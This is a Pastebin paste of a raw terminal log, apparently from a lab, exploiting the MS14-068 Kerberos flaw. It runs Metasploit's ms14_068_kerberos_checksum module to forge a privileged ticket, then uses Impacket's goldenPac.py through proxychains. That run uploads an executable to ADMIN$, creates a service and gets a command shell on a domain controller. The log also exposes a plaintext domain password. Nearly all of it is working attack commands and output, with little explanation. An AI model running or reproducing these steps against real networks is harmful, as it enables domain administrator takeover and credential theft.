Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- msf auxiliary(socks4a) > use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
- msf auxiliary(ms14_068_kerberos_checksum) > show info
- Name: MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
- Module: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
- License: Metasploit Framework License (BSD)
- Rank: Normal
- Disclosed: 2014-11-18
- Provided by:
- Tom Maddock
- Sylvain Monne
- juan vazquez <juan.vazquez@metasploit.com>
- Basic options:
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- DOMAIN yes The Domain (upper case) Ex: DEMO.LOCAL
- PASSWORD yes The Domain User password
- RHOST yes The target address
- RPORT 88 yes The target port
- Timeout 10 yes The TCP timeout to establish connection and read data
- USER yes The Domain User
- USER_SID yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
- Description:
- This module exploits a vulnerability in the Microsoft Kerberos
- implementation. The problem exists in the verification of the
- Privilege Attribute Certificate (PAC) from a Kerberos TGS request,
- where a domain user may forge a PAC with arbitrary privileges,
- including Domain Administrator. This module requests a TGT ticket
- with a forged PAC and exports it to a MIT Kerberos Credential Cache
- file. It can be loaded on Windows systems with the Mimikatz help. It
- has been tested successfully on Windows 2008.
- References:
- https://cvedetails.com/cve/CVE-2014-6324/
- https://technet.microsoft.com/en-us/library/security/MS14-068
- OSVDB (114751)
- http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx
- https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/
- https://github.com/bidord/pykek
- https://community.rapid7.com/community/metasploit/blog/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit
- msf auxiliary(ms14_068_kerberos_checksum) > set DOMAIN contoso-west.org
- DOMAIN => contoso-west.org
- msf auxiliary(ms14_068_kerberos_checksum) > set RHOST 10.0.0.149
- RHOST => 10.0.0.149
- msf auxiliary(ms14_068_kerberos_checksum) > set USER blot
- USER => blot
- msf auxiliary(ms14_068_kerberos_checksum) > set user_sid S-1-5-21-3039018489-1111549232-2925702125-1109
- user_sid => S-1-5-21-3039018489-1111549232-2925702125-1109
- msf auxiliary(ms14_068_kerberos_checksum) > show options
- Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- DOMAIN CONTOSO-WEST yes The Domain (upper case) Ex: DEMO.LOCAL
- PASSWORD yes The Domain User password
- RHOST 10.0.0.149 yes The target address
- RPORT 88 yes The target port
- Timeout 10 yes The TCP timeout to establish connection and read data
- USER blot yes The Domain User
- USER_SID S-1-5-21-3039018489-1111549232-2925702125-1109 yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
- msf auxiliary(ms14_068_kerberos_checksum) > set PASSWORD Bl0tt12309-
- PASSWORD => Bl0tt12309-
- msf auxiliary(ms14_068_kerberos_checksum) > show options
- Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- DOMAIN CONTOSO-WEST yes The Domain (upper case) Ex: DEMO.LOCAL
- PASSWORD Bl0tt12309- yes The Domain User password
- RHOST 10.0.0.149 yes The target address
- RPORT 88 yes The target port
- Timeout 10 yes The TCP timeout to establish connection and read data
- USER blot yes The Domain User
- USER_SID S-1-5-21-3039018489-1111549232-2925702125-1109 yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
- msf auxiliary(ms14_068_kerberos_checksum) > run
- [*] Validating options...
- [*] Using domain CONTOSO-WEST...
- [*] 10.0.0.149:88 - Sending AS-REQ...
- [*] 10.0.0.149:88 - Parsing AS-REP...
- [*] 10.0.0.149:88 - Sending TGS-REQ...
- [!] 10.0.0.149:88 - KRB_AP_ERR_BADMATCH - Ticket and authenticator don't match
- [-] 10.0.0.149:88 - Invalid TGS-REP, aborting...
- [*] Auxiliary module execution completed
- msf auxiliary(ms14_068_kerberos_checksum) > set domain contoso-west.org
- domain => contoso-west.org
- msf auxiliary(ms14_068_kerberos_checksum) > run
- [*] Validating options...
- [*] Using domain CONTOSO-WEST.ORG...
- [*] 10.0.0.149:88 - Sending AS-REQ...
- [*] 10.0.0.149:88 - Parsing AS-REP...
- [*] 10.0.0.149:88 - Sending TGS-REQ...
- [+] 10.0.0.149:88 - Valid TGS-Response, extracting credentials...
- [+] 10.0.0.149:88 - MIT Credential Cache saved on /root/.msf4/loot/20181109211513_default_10.0.0.149_windows.kerberos_173395.bin
- [*] Auxiliary module execution completed
- proxychains net rpc -W contoso-west.org -U blot -S 10.0.0.149 shell
- ProxyChains-3.1 (http://proxychains.sf.net)
- Enter blot's password:
- |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
- Talking to domain CONTOSO-WEST (S-1-5-21-3039018489-1111549232-2925702125)
- net rpc> user
- net rpc user> show
- Usage: net rpc user show <username>
- net rpc user show failed: NT_STATUS_INVALID_PARAMETER
- net rpc user> show blot
- user rid: 1109, group rid: 513
- net rpc user> packet_write_wait: Connection to 2001:700:300:7::85 port 22: Broken pipe
- auxiliary/admin/kerberos/ms14_068_kerberos_checksum
- msf auxiliary(ms14_068_kerberos_checksum) > show info
- Name: MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
- Module: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
- License: Metasploit Framework License (BSD)
- Rank: Normal
- Disclosed: 2014-11-18
- Provided by:
- Tom Maddock
- Sylvain Monne
- juan vazquez <juan.vazquez@metasploit.com>
- Basic options:
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- DOMAIN yes The Domain (upper case) Ex: DEMO.LOCAL
- PASSWORD yes The Domain User password
- RHOST yes The target address
- RPORT 88 yes The target port
- Timeout 10 yes The TCP timeout to establish connection and read data
- USER yes The Domain User
- USER_SID yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
- Description:
- This module exploits a vulnerability in the Microsoft Kerberos
- implementation. The problem exists in the verification of the
- Privilege Attribute Certificate (PAC) from a Kerberos TGS request,
- where a domain user may forge a PAC with arbitrary privileges,
- including Domain Administrator. This module requests a TGT ticket
- with a forged PAC and exports it to a MIT Kerberos Credential Cache
- file. It can be loaded on Windows systems with the Mimikatz help. It
- has been tested successfully on Windows 2008.
- References:
- https://cvedetails.com/cve/CVE-2014-6324/
- https://technet.microsoft.com/en-us/library/security/MS14-068
- OSVDB (114751)
- http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx
- https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/
- https://github.com/bidord/pykek
- https://community.rapid7.com/community/metasploit/blog/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit
- msf auxiliary(ms14_068_kerberos_checksum) > set DOMAIN contoso-west.org
- DOMAIN => CONTOSO-WEST
- msf auxiliary(ms14_068_kerberos_checksum) > set RHOST 10.0.0.149
- RHOST => 10.0.0.149
- msf auxiliary(ms14_068_kerberos_checksum) > set USER blot
- USER => blot
- msf auxiliary(ms14_068_kerberos_checksum) > set user_sid S-1-5-21-3039018489-1111549232-2925702125-1109
- user_sid => S-1-5-21-3039018489-1111549232-2925702125-1109
- msf auxiliary(ms14_068_kerberos_checksum) > set PASSWORD Bl0tt12309-
- msf auxiliary(ms14_068_kerberos_checksum) > show options
- Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- DOMAIN contoso-west.org yes The Domain (upper case) Ex: DEMO.LOCAL
- PASSWORD Bl0tt12309- yes The Domain User password
- RHOST 10.0.0.149 yes The target address
- RPORT 88 yes The target port
- Timeout 10 yes The TCP timeout to establish connection and read data
- USER blot yes The Domain User
- USER_SID S-1-5-21-3039018489-1111549232-2925702125-1109 yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
- msf auxiliary(ms14_068_kerberos_checksum) > run
- [*] Validating options...
- [*] Using domain CONTOSO-WEST.ORG...
- [*] 10.0.0.149:88 - Sending AS-REQ...
- [*] 10.0.0.149:88 - Parsing AS-REP...
- [*] 10.0.0.149:88 - Sending TGS-REQ...
- [+] 10.0.0.149:88 - Valid TGS-Response, extracting credentials...
- [+] 10.0.0.149:88 - MIT Credential Cache saved on /root/.msf4/loot/20181109211513_default_10.0.0.149_windows.kerberos_173395.bin
- [*] Auxiliary module execution completed
- root@10-kali2-group10:~/.msf4/loot# ls
- 20181010173151_default_192.168.40.14_192.168.40.14_ce_775643.crt
- 20181010173151_default_192.168.40.14_192.168.40.14_ke_958653.key
- 20181010173151_default_192.168.40.14_192.168.40.14_pe_462147.pem
- 20181109211513_default_10.0.0.149_windows.kerberos_173395.bin
- root@10-kali2-group10:~/.msf4/loot#
- To use this ticket, which is in the Credential Cache (ccache) format, we need to move it to the /tmp directory where the Kerberos tools look for tickets
- root@10-kali2-group10:~/.msf4/loot# mv 20181109211513_default_10.0.0.149_windows.kerberos_173395.bin /tmp/krb5cc
- Modified the nano /etc/krb5.conf
- added: [realms]
- CONTOSO-WEST.ORG = {
- kdc = dc2008r2-group1
- admin_server = dc2008r2-group1
- default_domain = CONTOSO-WEST
- }
- [domain_realm]
- .contoso-west = CONTOSO-WEST.org
- contoso-west = CONTOSO-WEST.org
- proxychains python2.7 examples/goldenPac.py -dc-ip 10.0.0.149 -target-ip 10.0.0.149 CONTOSO-WEST.org/Blot@dc2008r2-group1.CONTOSO-WEST.org
- ProxyChains-3.1 (http://proxychains.sf.net)
- Impacket v0.9.18-dev - Copyright 2018 SecureAuth Corporation
- Password:Bl0tt12309-
- |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
- [*] User SID: S-1-5-21-3039018489-1111549232-2925702125-1109
- |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
- |DNS-request| contoso-west.org
- |S-chain|-<>-127.0.0.1:1099-<><>-4.2.2.2:53-<><>-OK
- |DNS-response|: contoso-west.org does not exist
- [-] Couldn't get forest info ([Errno Connection error (contoso-west.org:445)] [Errno 1] Unknown error), continuing
- [*] Attacking domain controller 10.0.0.149
- |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
- |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
- |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
- |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
- [*] 10.0.0.149 found vulnerable!
- |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
- [*] Requesting shares on 10.0.0.149.....
- [*] Found writable share ADMIN$
- [*] Uploading file UApVHfro.exe
- [*] Opening SVCManager on 10.0.0.149.....
- [*] Creating service TGOJ on 10.0.0.149.....
- [*] Starting service TGOJ.....
- |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
- |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
- [!] Press help for extra shell commands
- |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
- Microsoft Windows [Version 6.1.7601]
- Copyright (c) 2009 Microsoft Corporation. All rights reserved.
- C:\Windows\system32>ipconfig
- Windows IP Configuration
- Ethernet adapter Local Area Connection:
- Connection-specific DNS Suffix . :
- IPv4 Address. . . . . . . . . . . : 10.0.0.149
- Subnet Mask . . . . . . . . . . . : 255.255.255.240
- Default Gateway . . . . . . . . . : 10.0.0.145
- Tunnel adapter isatap.{E58D4114-3C3A-46FD-AEAD-ECA142ED8636}:
- Media State . . . . . . . . . . . : Media disconnected
- Connection-specific DNS Suffix . :
- C:\Windows\system32>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement